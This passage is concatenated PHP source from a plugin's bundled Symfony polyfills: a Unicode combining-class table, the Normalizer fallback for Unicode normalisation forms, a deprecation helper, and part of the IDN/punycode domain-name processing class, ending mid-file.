=> 230, '᭳' => 230, '᮪' => 9, '᮫' => 9, '᯦' => 7, '᯲' => 9, '᯳' => 9, '᰷' => 7, '᳐' => 230, '᳑' => 230, '᳒' => 230, '᳔' => 1, '᳕' => 220, '᳖' => 220, '᳗' => 220, '᳘' => 220, '᳙' => 220, '᳚' => 230, '᳛' => 230, '᳜' => 220, '᳝' => 220, '᳞' => 220, '᳟' => 220, '᳠' => 230, '᳢' => 1, '᳣' => 1, '᳤' => 1, '᳥' => 1, '᳦' => 1, '᳧' => 1, '᳨' => 1, '᳭' => 220, '᳴' => 230, '᳸' => 230, '᳹' => 230, '᷀' => 230, '᷁' => 230, '᷂' => 220, '᷃' => 230, '᷄' => 230, '᷅' => 230, '᷆' => 230, '᷇' => 230, '᷈' => 230, '᷉' => 230, '᷊' => 220, '᷋' => 230, '᷌' => 230, '᷍' => 234, '᷎' => 214, '᷏' => 220, '᷐' => 202, '᷑' => 230, '᷒' => 230, 'ᷓ' => 230, 'ᷔ' => 230, 'ᷕ' => 230, 'ᷖ' => 230, 'ᷗ' => 230, 'ᷘ' => 230, 'ᷙ' => 230, 'ᷚ' => 230, 'ᷛ' => 230, 'ᷜ' => 230, 'ᷝ' => 230, 'ᷞ' => 230, 'ᷟ' => 230, 'ᷠ' => 230, 'ᷡ' => 230, 'ᷢ' => 230, 'ᷣ' => 230, 'ᷤ' => 230, 'ᷥ' => 230, 'ᷦ' => 230, 'ᷧ' => 230, 'ᷨ' => 230, 'ᷩ' => 230, 'ᷪ' => 230, 'ᷫ' => 230, 'ᷬ' => 230, 'ᷭ' => 230, 'ᷮ' => 230, 'ᷯ' => 230, 'ᷰ' => 230, 'ᷱ' => 230, 'ᷲ' => 230, 'ᷳ' => 230, 'ᷴ' => 230, '᷵' => 230, '᷶' => 232, '᷷' => 228, '᷸' => 228, '᷹' => 220, '᷻' => 230, '᷼' => 233, '᷽' => 220, '᷾' => 230, '᷿' => 220, '⃐' => 230, '⃑' => 230, '⃒' => 1, '⃓' => 1, '⃔' => 230, '⃕' => 230, '⃖' => 230, '⃗' => 230, '⃘' => 1, '⃙' => 1, '⃚' => 1, '⃛' => 230, '⃜' => 230, '⃡' => 230, '⃥' => 1, '⃦' => 1, '⃧' => 230, '⃨' => 220, '⃩' => 230, '⃪' => 1, '⃫' => 1, '⃬' => 220, '⃭' => 220, '⃮' => 220, '⃯' => 220, '⃰' => 230, '⳯' => 230, '⳰' => 230, '⳱' => 230, '⵿' => 9, 'ⷠ' => 230, 'ⷡ' => 230, 'ⷢ' => 230, 'ⷣ' => 230, 'ⷤ' => 230, 'ⷥ' => 230, 'ⷦ' => 230, 'ⷧ' => 230, 'ⷨ' => 230, 'ⷩ' => 230, 'ⷪ' => 230, 'ⷫ' => 230, 'ⷬ' => 230, 'ⷭ' => 230, 'ⷮ' => 230, 'ⷯ' => 230, 'ⷰ' => 230, 'ⷱ' => 230, 'ⷲ' => 230, 'ⷳ' => 230, 'ⷴ' => 230, 'ⷵ' => 230, 'ⷶ' => 230, 'ⷷ' => 230, 'ⷸ' => 230, 'ⷹ' => 230, 'ⷺ' => 230, 'ⷻ' => 230, 'ⷼ' => 230, 'ⷽ' => 230, 'ⷾ' => 230, 'ⷿ' => 230, '〪' => 218, '〫' => 228, '〬' => 232, '〭' => 222, '〮' => 224, '〯' => 224, '゙' => 8, '゚' => 8, '꙯' => 230, 'ꙴ' => 230, 'ꙵ' => 230, 'ꙶ' => 230, 'ꙷ' => 230, 'ꙸ' => 230, 'ꙹ' => 230, 'ꙺ' => 230, 'ꙻ' => 230, '꙼' => 230, '꙽' => 230, 'ꚞ' => 230, 'ꚟ' => 230, '꛰' => 230, '꛱' => 230, '꠆' => 9, '꠬' => 9, '꣄' => 9, '꣠' => 230, '꣡' => 230, '꣢' => 230, '꣣' => 230, '꣤' => 230, '꣥' => 230, '꣦' => 230, '꣧' => 230, '꣨' => 230, '꣩' => 230, '꣪' => 230, '꣫' => 230, '꣬' => 230, '꣭' => 230, '꣮' => 230, '꣯' => 230, '꣰' => 230, '꣱' => 230, '꤫' => 220, '꤬' => 220, '꤭' => 220, '꥓' => 9, '꦳' => 7, '꧀' => 9, 'ꪰ' => 230, 'ꪲ' => 230, 'ꪳ' => 230, 'ꪴ' => 220, 'ꪷ' => 230, 'ꪸ' => 230, 'ꪾ' => 230, '꪿' => 230, '꫁' => 230, '꫶' => 9, '꯭' => 9, 'ﬞ' => 26, '︠' => 230, '︡' => 230, '︢' => 230, '︣' => 230, '︤' => 230, '︥' => 230, '︦' => 230, '︧' => 220, '︨' => 220, '︩' => 220, '︪' => 220, '︫' => 220, '︬' => 220, '︭' => 220, '︮' => 230, '︯' => 230, '𐇽' => 220, '𐋠' => 220, '𐍶' => 230, '𐍷' => 230, '𐍸' => 230, '𐍹' => 230, '𐍺' => 230, '𐨍' => 220, '𐨏' => 230, '𐨸' => 230, '𐨹' => 1, '𐨺' => 220, '𐨿' => 9, '𐫥' => 230, '𐫦' => 220, '𐴤' => 230, '𐴥' => 230, '𐴦' => 230, '𐴧' => 230, '𐺫' => 230, '𐺬' => 230, '𐽆' => 220, '𐽇' => 220, '𐽈' => 230, '𐽉' => 230, '𐽊' => 230, '𐽋' => 220, '𐽌' => 230, '𐽍' => 220, '𐽎' => 220, '𐽏' => 220, '𐽐' => 220, '𑁆' => 9, '𑁿' => 9, '𑂹' => 9, '𑂺' => 7, '𑄀' => 230, '𑄁' => 230, '𑄂' => 230, '𑄳' => 9, '𑄴' => 9, '𑅳' => 7, '𑇀' => 9, '𑇊' => 7, '𑈵' => 9, '𑈶' => 7, '𑋩' => 7, '𑋪' => 9, '𑌻' => 7, '𑌼' => 7, '𑍍' => 9, '𑍦' => 230, '𑍧' => 230, '𑍨' => 230, '𑍩' => 230, '𑍪' => 230, '𑍫' => 230, '𑍬' => 230, '𑍰' => 230, '𑍱' => 230, '𑍲' => 230, '𑍳' => 230, '𑍴' => 230, '𑑂' => 9, '𑑆' => 7, '𑑞' => 230, '𑓂' => 9, '𑓃' => 7, '𑖿' => 9, '𑗀' => 7, '𑘿' => 9, '𑚶' => 9, '𑚷' => 7, '𑜫' => 9, '𑠹' => 9, '𑠺' => 7, '𑤽' => 9, '𑤾' => 9, '𑥃' => 7, '𑧠' => 9, '𑨴' => 9, '𑩇' => 9, '𑪙' => 9, '𑰿' => 9, '𑵂' => 7, '𑵄' => 9, '𑵅' => 9, '𑶗' => 9, '𖫰' => 1, '𖫱' => 1, '𖫲' => 1, '𖫳' => 1, '𖫴' => 1, '𖬰' => 230, '𖬱' => 230, '𖬲' => 230, '𖬳' => 230, '𖬴' => 230, '𖬵' => 230, '𖬶' => 230, '𖿰' => 6, '𖿱' => 6, '𛲞' => 1, '𝅥' => 216, '𝅦' => 216, '𝅧' => 1, '𝅨' => 1, '𝅩' => 1, '𝅭' => 226, '𝅮' => 216, '𝅯' => 216, '𝅰' => 216, '𝅱' => 216, '𝅲' => 216, '𝅻' => 220, '𝅼' => 220, '𝅽' => 220, '𝅾' => 220, '𝅿' => 220, '𝆀' => 220, '𝆁' => 220, '𝆂' => 220, '𝆅' => 230, '𝆆' => 230, '𝆇' => 230, '𝆈' => 230, '𝆉' => 230, '𝆊' => 220, '𝆋' => 220, '𝆪' => 230, '𝆫' => 230, '𝆬' => 230, '𝆭' => 230, '𝉂' => 230, '𝉃' => 230, '𝉄' => 230, '𞀀' => 230, '𞀁' => 230, '𞀂' => 230, '𞀃' => 230, '𞀄' => 230, '𞀅' => 230, '𞀆' => 230, '𞀈' => 230, '𞀉' => 230, '𞀊' => 230, '𞀋' => 230, '𞀌' => 230, '𞀍' => 230, '𞀎' => 230, '𞀏' => 230, '𞀐' => 230, '𞀑' => 230, '𞀒' => 230, '𞀓' => 230, '𞀔' => 230, '𞀕' => 230, '𞀖' => 230, '𞀗' => 230, '𞀘' => 230, '𞀛' => 230, '𞀜' => 230, '𞀝' => 230, '𞀞' => 230, '𞀟' => 230, '𞀠' => 230, '𞀡' => 230, '𞀣' => 230, '𞀤' => 230, '𞀦' => 230, '𞀧' => 230, '𞀨' => 230, '𞀩' => 230, '𞀪' => 230, '𞄰' => 230, '𞄱' => 230, '𞄲' => 230, '𞄳' => 230, '𞄴' => 230, '𞄵' => 230, '𞄶' => 230, '𞋬' => 230, '𞋭' => 230, '𞋮' => 230, '𞋯' => 230, '𞣐' => 220, '𞣑' => 220, '𞣒' => 220, '𞣓' => 220, '𞣔' => 220, '𞣕' => 220, '𞣖' => 220, '𞥄' => 230, '𞥅' => 230, '𞥆' => 230, '𞥇' => 230, '𞥈' => 230, '𞥉' => 230, '𞥊' => 7); <?php /* namespace Google\Site_Kit_Dependencies intentionally removed */ class Normalizer extends \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Normalizer\Normalizer { /** * @deprecated since ICU 56 and removed in PHP 8 */ public const NONE = 2; public const FORM_D = 4; public const FORM_KD = 8; public const FORM_C = 16; public const FORM_KC = 32; public const NFD = 4; public const NFKD = 8; public const NFC = 16; public const NFKC = 32; } <?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Normalizer; /** * Normalizer is a PHP fallback implementation of the Normalizer class provided by the intl extension. * * It has been validated with Unicode 6.3 Normalization Conformance Test. * See http://www.unicode.org/reports/tr15/ for detailed info about Unicode normalizations. * * @author Nicolas Grekas <p@tchwork.com> * * @internal */ class Normalizer { public const FORM_D = \Normalizer::FORM_D; public const FORM_KD = \Normalizer::FORM_KD; public const FORM_C = \Normalizer::FORM_C; public const FORM_KC = \Normalizer::FORM_KC; public const NFD = \Normalizer::NFD; public const NFKD = \Normalizer::NFKD; public const NFC = \Normalizer::NFC; public const NFKC = \Normalizer::NFKC; private static $C; private static $D; private static $KD; private static $cC; private static $ulenMask = ["\xc0" => 2, "\xd0" => 2, "\xe0" => 3, "\xf0" => 4]; private static $ASCII = " eiasntrolud][cmp'\ng|hv.fb,:=-q10C2*yx)(L9AS/P\"EjMIk3>5T<D4}B{8FwR67UGN;JzV#HOW_&!K?XQ%Y\\\tZ+~^\$@`\x00\x01\x02\x03\x04\x05\x06\x07\x08\v\f\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"; public static function isNormalized(string $s, int $form = self::FORM_C) { if (!\in_array($form, [self::NFD, self::NFKD, self::NFC, self::NFKC])) { return \false; } if (!isset($s[\strspn($s, self::$ASCII)])) { return \true; } if (self::NFC == $form && \preg_match('//u', $s) && !\preg_match('/[^\\x00-\\x{2FF}]/u', $s)) { return \true; } return self::normalize($s, $form) === $s; } public static function normalize(string $s, int $form = self::FORM_C) { if (!\preg_match('//u', $s)) { return \false; } switch ($form) { case self::NFC: $C = \true; $K = \false; break; case self::NFD: $C = \false; $K = \false; break; case self::NFKC: $C = \true; $K = \true; break; case self::NFKD: $C = \false; $K = \true; break; default: if (\defined('Normalizer::NONE') && \Normalizer::NONE == $form) { return $s; } if (80000 > \PHP_VERSION_ID) { return \false; } throw new \ValueError('normalizer_normalize(): Argument #2 ($form) must be a a valid normalization form'); } if ('' === $s) { return ''; } if ($K && null === self::$KD) { self::$KD = self::getData('compatibilityDecomposition'); } if (null === self::$D) { self::$D = self::getData('canonicalDecomposition'); self::$cC = self::getData('combiningClass'); } if (null !== ($mbEncoding = 2 & (int) \ini_get('mbstring.func_overload') ? \mb_internal_encoding() : null)) { \mb_internal_encoding('8bit'); } $r = self::decompose($s, $K); if ($C) { if (null === self::$C) { self::$C = self::getData('canonicalComposition'); } $r = self::recompose($r); } if (null !== $mbEncoding) { \mb_internal_encoding($mbEncoding); } return $r; } private static function recompose($s) { $ASCII = self::$ASCII; $compMap = self::$C; $combClass = self::$cC; $ulenMask = self::$ulenMask; $result = $tail = ''; $i = $s[0] < "\x80" ? 1 : $ulenMask[$s[0] & "\xf0"]; $len = \strlen($s); $lastUchr = \substr($s, 0, $i); $lastUcls = isset($combClass[$lastUchr]) ? 256 : 0; while ($i < $len) { if ($s[$i] < "\x80") { // ASCII chars if ($tail) { $lastUchr .= $tail; $tail = ''; } if ($j = \strspn($s, $ASCII, $i + 1)) { $lastUchr .= \substr($s, $i, $j); $i += $j; } $result .= $lastUchr; $lastUchr = $s[$i]; $lastUcls = 0; ++$i; continue; } $ulen = $ulenMask[$s[$i] & "\xf0"]; $uchr = \substr($s, $i, $ulen); if ($lastUchr < "ᄀ" || "ᄒ" < $lastUchr || $uchr < "ᅡ" || "ᅵ" < $uchr || $lastUcls) { // Table lookup and combining chars composition $ucls = $combClass[$uchr] ?? 0; if (isset($compMap[$lastUchr . $uchr]) && (!$lastUcls || $lastUcls < $ucls)) { $lastUchr = $compMap[$lastUchr . $uchr]; } elseif ($lastUcls = $ucls) { $tail .= $uchr; } else { if ($tail) { $lastUchr .= $tail; $tail = ''; } $result .= $lastUchr; $lastUchr = $uchr; } } else { // Hangul chars $L = \ord($lastUchr[2]) - 0x80; $V = \ord($uchr[2]) - 0xa1; $T = 0; $uchr = \substr($s, $i + $ulen, 3); if ("ᆧ" <= $uchr && $uchr <= "ᇂ") { $T = \ord($uchr[2]) - 0xa7; 0 > $T && ($T += 0x40); $ulen += 3; } $L = 0xac00 + ($L * 21 + $V) * 28 + $T; $lastUchr = \chr(0xe0 | $L >> 12) . \chr(0x80 | $L >> 6 & 0x3f) . \chr(0x80 | $L & 0x3f); } $i += $ulen; } return $result . $lastUchr . $tail; } private static function decompose($s, $c) { $result = ''; $ASCII = self::$ASCII; $decompMap = self::$D; $combClass = self::$cC; $ulenMask = self::$ulenMask; if ($c) { $compatMap = self::$KD; } $c = []; $i = 0; $len = \strlen($s); while ($i < $len) { if ($s[$i] < "\x80") { // ASCII chars if ($c) { \ksort($c); $result .= \implode('', $c); $c = []; } $j = 1 + \strspn($s, $ASCII, $i + 1); $result .= \substr($s, $i, $j); $i += $j; continue; } $ulen = $ulenMask[$s[$i] & "\xf0"]; $uchr = \substr($s, $i, $ulen); $i += $ulen; if ($uchr < "가" || "힣" < $uchr) { // Table lookup if ($uchr !== ($j = $compatMap[$uchr] ?? $decompMap[$uchr] ?? $uchr)) { $uchr = $j; $j = \strlen($uchr); $ulen = $uchr[0] < "\x80" ? 1 : $ulenMask[$uchr[0] & "\xf0"]; if ($ulen != $j) { // Put trailing chars in $s $j -= $ulen; $i -= $j; if (0 > $i) { $s = \str_repeat(' ', -$i) . $s; $len -= $i; $i = 0; } while ($j--) { $s[$i + $j] = $uchr[$ulen + $j]; } $uchr = \substr($uchr, 0, $ulen); } } if (isset($combClass[$uchr])) { // Combining chars, for sorting if (!isset($c[$combClass[$uchr]])) { $c[$combClass[$uchr]] = ''; } $c[$combClass[$uchr]] .= $uchr; continue; } } else { // Hangul chars $uchr = \unpack('C*', $uchr); $j = ($uchr[1] - 224 << 12) + ($uchr[2] - 128 << 6) + $uchr[3] - 0xac80; $uchr = "\xe1\x84" . \chr(0x80 + (int) ($j / 588)) . "\xe1\x85" . \chr(0xa1 + (int) ($j % 588 / 28)); if ($j %= 28) { $uchr .= $j < 25 ? "\xe1\x86" . \chr(0xa7 + $j) : "\xe1\x87" . \chr(0x67 + $j); } } if ($c) { \ksort($c); $result .= \implode('', $c); $c = []; } $result .= $uchr; } if ($c) { \ksort($c); $result .= \implode('', $c); } return $result; } private static function getData($file) { if (\file_exists($file = __DIR__ . '/Resources/unidata/' . $file . '.php')) { return require $file; } return \false; } } <?php namespace Google\Site_Kit_Dependencies; /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ if (!\function_exists('Google\\Site_Kit_Dependencies\\trigger_deprecation')) { /** * Triggers a silenced deprecation notice. * * @param string $package The name of the Composer package that is triggering the deprecation * @param string $version The version of the package that introduced the deprecation * @param string $message The message of the deprecation * @param mixed ...$args Values to insert in the message using printf() formatting * * @author Nicolas Grekas <p@tchwork.com> */ function trigger_deprecation(string $package, string $version, string $message, ...$args) : void { @\trigger_error(($package || $version ? "Since {$package} {$version}: " : '') . ($args ? \vsprintf($message, $args) : $message), \E_USER_DEPRECATED); } } <?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> and Trevor Rowbotham <trevor.rowbotham@pm.me> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn; use Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Resources\unidata\DisallowedRanges; use Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Resources\unidata\Regex; /** * @see https://www.unicode.org/reports/tr46/ * * @internal */ final class Idn { public const ERROR_EMPTY_LABEL = 1; public const ERROR_LABEL_TOO_LONG = 2; public const ERROR_DOMAIN_NAME_TOO_LONG = 4; public const ERROR_LEADING_HYPHEN = 8; public const ERROR_TRAILING_HYPHEN = 0x10; public const ERROR_HYPHEN_3_4 = 0x20; public const ERROR_LEADING_COMBINING_MARK = 0x40; public const ERROR_DISALLOWED = 0x80; public const ERROR_PUNYCODE = 0x100; public const ERROR_LABEL_HAS_DOT = 0x200; public const ERROR_INVALID_ACE_LABEL = 0x400; public const ERROR_BIDI = 0x800; public const ERROR_CONTEXTJ = 0x1000; public const ERROR_CONTEXTO_PUNCTUATION = 0x2000; public const ERROR_CONTEXTO_DIGITS = 0x4000; public const INTL_IDNA_VARIANT_2003 = 0; public const INTL_IDNA_VARIANT_UTS46 = 1; public const IDNA_DEFAULT = 0; public const IDNA_ALLOW_UNASSIGNED = 1; public const IDNA_USE_STD3_RULES = 2; public const IDNA_CHECK_BIDI = 4; public const IDNA_CHECK_CONTEXTJ = 8; public const IDNA_NONTRANSITIONAL_TO_ASCII = 16; public const IDNA_NONTRANSITIONAL_TO_UNICODE = 32; public const MAX_DOMAIN_SIZE = 253; public const MAX_LABEL_SIZE = 63; public const BASE = 36; public const TMIN = 1; public const TMAX = 26; public const SKEW = 38; public const DAMP = 700; public const INITIAL_BIAS = 72; public const INITIAL_N = 128; public const DELIMITER = '-'; public const MAX_INT = 2147483647; /** * Contains the numeric value of a basic code point (for use in representing integers) in the * range 0 to BASE-1, or -1 if b is does not represent a value. * * @var array<int, int> */ private static $basicToDigit = [-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1]; /** * @var array<int, int> */ private static $virama; /** * @var array<int, string> */ private static $mapped; /** * @var array<int, bool> */ private static $ignored; /** * @var array<int, string> */ private static $deviation; /** * @var array<int, bool> */ private static $disallowed; /** * @var array<int, string> */ private static $disallowed_STD3_mapped; /** * @var array<int, bool> */ private static $disallowed_STD3_valid; /** * @var bool */ private static $mappingTableLoaded = \false; /** * @see https://www.unicode.org/reports/tr46/#ToASCII * * @param string $domainName * @param int $options * @param int $variant * @param array $idna_info * * @return string|false */ public static function idn_to_ascii($domainName, $options = self::IDNA_DEFAULT, $variant = self::INTL_IDNA_VARIANT_UTS46, &$idna_info = []) { if (\PHP_VERSION_ID >= 70200 && self::INTL_IDNA_VARIANT_2003 === $variant) { @\trigger_error('idn_to_ascii(): INTL_IDNA_VARIANT_2003 is deprecated', \E_USER_DEPRECATED); } $options = ['CheckHyphens' => \true, 'CheckBidi' => self::INTL_IDNA_VARIANT_2003 === $variant || 0 !== ($options & self::IDNA_CHECK_BIDI), 'CheckJoiners' => self::INTL_IDNA_VARIANT_UTS46 === $variant && 0 !== ($options & self::IDNA_CHECK_CONTEXTJ), 'UseSTD3ASCIIRules' => 0 !== ($options & self::IDNA_USE_STD3_RULES), 'Transitional_Processing' => self::INTL_IDNA_VARIANT_2003 === $variant || 0 === ($options & self::IDNA_NONTRANSITIONAL_TO_ASCII), 'VerifyDnsLength' => \true]; $info = new \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Info(); $labels = self::process((string) $domainName, $options, $info); foreach ($labels as $i => $label) { // Only convert labels to punycode that contain non-ASCII code points if (1 === \preg_match('/[^\\x00-\\x7F]/', $label)) { try { $label = 'xn--' . self::punycodeEncode($label); } catch (\Exception $e) { $info->errors |= self::ERROR_PUNYCODE; } $labels[$i] = $label; } } if ($options['VerifyDnsLength']) { self::validateDomainAndLabelLength($labels, $info); } $idna_info = ['result' => \implode('.', $labels), 'isTransitionalDifferent' => $info->transitionalDifferent, 'errors' => $info->errors]; return 0 === $info->errors ? $idna_info['result'] : \false; } /** * @see https://www.unicode.org/reports/tr46/#ToUnicode * * @param string $domainName * @param int $options * @param int $variant * @param array $idna_info * * @return string|false */ public static function idn_to_utf8($domainName, $options = self::IDNA_DEFAULT, $variant = self::INTL_IDNA_VARIANT_UTS46, &$idna_info = []) { if (\PHP_VERSION_ID >= 70200 && self::INTL_IDNA_VARIANT_2003 === $variant) { @\trigger_error('idn_to_utf8(): INTL_IDNA_VARIANT_2003 is deprecated', \E_USER_DEPRECATED); } $info = new \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Info(); $labels = self::process((string) $domainName, ['CheckHyphens' => \true, 'CheckBidi' => self::INTL_IDNA_VARIANT_2003 === $variant || 0 !== ($options & self::IDNA_CHECK_BIDI), 'CheckJoiners' => self::INTL_IDNA_VARIANT_UTS46 === $variant && 0 !== ($options & self::IDNA_CHECK_CONTEXTJ), 'UseSTD3ASCIIRules' => 0 !== ($options & self::IDNA_USE_STD3_RULES), 'Transitional_Processing' => self::INTL_IDNA_VARIANT_2003 === $variant || 0 === ($options & self::IDNA_NONTRANSITIONAL_TO_UNICODE)], $info); $idna_info = ['result' => \implode('.', $labels), 'isTransitionalDifferent' => $info->transitionalDifferent, 'errors' => $info->errors]; return 0 === $info->errors ? $idna_info['result'] : \false; } /** * @param string $label * * @return bool */ private static function isValidContextJ(array $codePoints, $label) { if (!isset(self::$virama)) { self::$virama = (require __DIR__ . \DIRECTORY_SEPARATOR . 'Resources' . \DIRECTORY_SEPARATOR . 'unidata' . \DIRECTORY_SEPARATOR . 'virama.php'); } $offset = 0; foreach ($codePoints as $i => $codePoint) { if (0x200c !== $codePoint && 0x200d !== $codePoint) { continue; } if (!isset($codePoints[$i - 1])) { return \false; } // If Canonical_Combining_Class(Before(cp)) .eq. Virama Then True; if (isset(self::$virama[$codePoints[$i - 1]])) { continue; } // If RegExpMatch((Joining_Type:{L,D})(Joining_Type:T)*\u200C(Joining_Type:T)*(Joining_Type:{R,D})) Then // True; // Generated RegExp = ([Joining_Type:{L,D}][Joining_Type:T]*\u200C[Joining_Type:T]*)[Joining_Type:{R,D}] if (0x200c === $codePoint && 1 === \preg_match(\Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Resources\unidata\Regex::ZWNJ, $label, $matches, \PREG_OFFSET_CAPTURE, $offset)) { $offset += \strlen($matches[1][0]); continue; } return \false; } return \true; } /** * @see https://www.unicode.org/reports/tr46/#ProcessingStepMap * * @param string $input * @param array<string, bool> $options * * @return string */ private static function mapCodePoints($input, array $options, \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Info $info) { $str = ''; $useSTD3ASCIIRules = $options['UseSTD3ASCIIRules']; $transitional = $options['Transitional_Processing']; foreach (self::utf8Decode($input) as $codePoint) { $data = self::lookupCodePointStatus($codePoint, $useSTD3ASCIIRules); switch ($data['status']) { case 'disallowed': case 'valid': $str .= \mb_chr($codePoint, 'utf-8'); break; case 'ignored': // Do nothing. break; case 'mapped': $str .= $transitional && 0x1e9e === $codePoint ? 'ss' : $data['mapping']; break; case 'deviation': $info->transitionalDifferent = \true; $str .= $transitional ? $data['mapping'] : \mb_chr($codePoint, 'utf-8'); break; } } return $str; } /** * @see https://www.unicode.org/reports/tr46/#Processing * * @param string $domain * @param array<string, bool> $options * * @return array<int, string> */ private static function process($domain, array $options, \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Info $info) { // If VerifyDnsLength is not set, we are doing ToUnicode otherwise we are doing ToASCII and // we need to respect the VerifyDnsLength option. $checkForEmptyLabels = !isset($options['VerifyDnsLength']) || $options['VerifyDnsLength']; if ($checkForEmptyLabels && '' === $domain) { $info->errors |= self::ERROR_EMPTY_LABEL; return [$domain]; } // Step 1. Map each code point in the domain name string $domain = self::mapCodePoints($domain, $options, $info); // Step 2. Normalize the domain name string to Unicode Normalization Form C. if (!\Normalizer::isNormalized($domain, \Normalizer::FORM_C)) { $domain = \Normalizer::normalize($domain, \Normalizer::FORM_C); } // Step 3. Break the string into labels at U+002E (.) FULL STOP. $labels = \explode('.', $domain); $lastLabelIndex = \count($labels) - 1; // Step 4. Convert and validate each label in the domain name string. foreach ($labels as $i => $label) { $validationOptions = $options; if ('xn--' === \substr($label, 0, 4)) { // Step 4.1. If the label contains any non-ASCII code point (i.e., a code point greater than U+007F), // record that there was an error, and continue with the next label. if (\preg_match('/[^\\x00-\\x7F]/', $label)) { $info->errors |= self::ERROR_PUNYCODE; continue; } // Step 4.2. Attempt to convert the rest of the label to Unicode according to Punycode [RFC3492]. If // that conversion fails, record that there was an error, and continue // with the next label. Otherwise replace the original label in the string by the results of the // conversion. try { $label = self::punycodeDecode(\substr($label, 4)); } catch (\Exception $e) { $info->errors |= self::ERROR_PUNYCODE; continue; } $validationOptions['Transitional_Processing'] = \false; $labels[$i] = $label; } self::validateLabel($label, $info, $validationOptions, $i > 0 && $i === $lastLabelIndex); } if ($info->bidiDomain && !$info->validBidiDomain) { $info->errors |= self::ERROR_BIDI; } // Any input domain name string that does not record an error has been successfully // processed according to this specification. Conversely, if an input domain_name string // causes an error, then the processing of the input domain_name string fails. Determining // what to do with error input is up to the caller, and not in the scope of this document. return $labels; } /** * @see https://tools.ietf.org/html/rfc5893#section-2 * * @param string $label */ private static function validateBidiLabel($label, \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Info $info) { if (1 === \preg_match(\Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Resources\unidata\Regex::RTL_LABEL, $label)) { $info->bidiDomain = \true; // Step 1. The first character must be a character with Bidi property L, R, or AL. // If it has the R or AL property, it is an RTL label if (1 !== \preg_match(\Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Resources\unidata\Regex::BIDI_STEP_1_RTL, $label)) { $info->validBidiDomain = \false; return; } // Step 2. In an RTL label, only characters with the Bidi properties R, AL, AN, EN, ES, // CS, ET, ON, BN, or NSM are allowed. if (1 === \preg_match(\Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Resources\unidata\Regex::BIDI_STEP_2, $label)) { $info->validBidiDomain = \false; return; } // Step 3. In an RTL label, the end of the label must be a character with Bidi property // R, AL, EN, or AN, followed by zero or more characters with Bidi property NSM. if (1 !== \preg_match(\Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Resources\unidata\Regex::BIDI_STEP_3, $label)) { $info->validBidiDomain = \false; return; } // Step 4. In an RTL label, if an EN is present, no AN may be present, and vice versa. if (1 === \preg_match(\Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Resources\unidata\Regex::BIDI_STEP_4_AN, $label) && 1 === \preg_match(\Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Resources\unidata\Regex::BIDI_STEP_4_EN, $label)) { $info->validBidiDomain = \false; return; } return; } // We are a LTR label // Step 1. The first character must be a character with Bidi property L, R, or AL. // If it has the L property, it is an LTR label. if (1 !== \preg_match(\Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Resources\unidata\Regex::BIDI_STEP_1_LTR, $label)) { $info->validBidiDomain = \false; return; } // Step 5. In an LTR label, only characters with the Bidi properties L, EN, // ES, CS, ET, ON, BN, or NSM are allowed. if (1 === \preg_match(\Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Resources\unidata\Regex::BIDI_STEP_5, $label)) { $info->validBidiDomain = \false; return; } // Step 6.In an LTR label, the end of the label must be a character with Bidi property L or // EN, followed by zero or more characters with Bidi property NSM. if (1 !== \preg_match(\Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Resources\unidata\Regex::BIDI_STEP_6, $label)) { $info->validBidiDomain = \false; return; } } /** 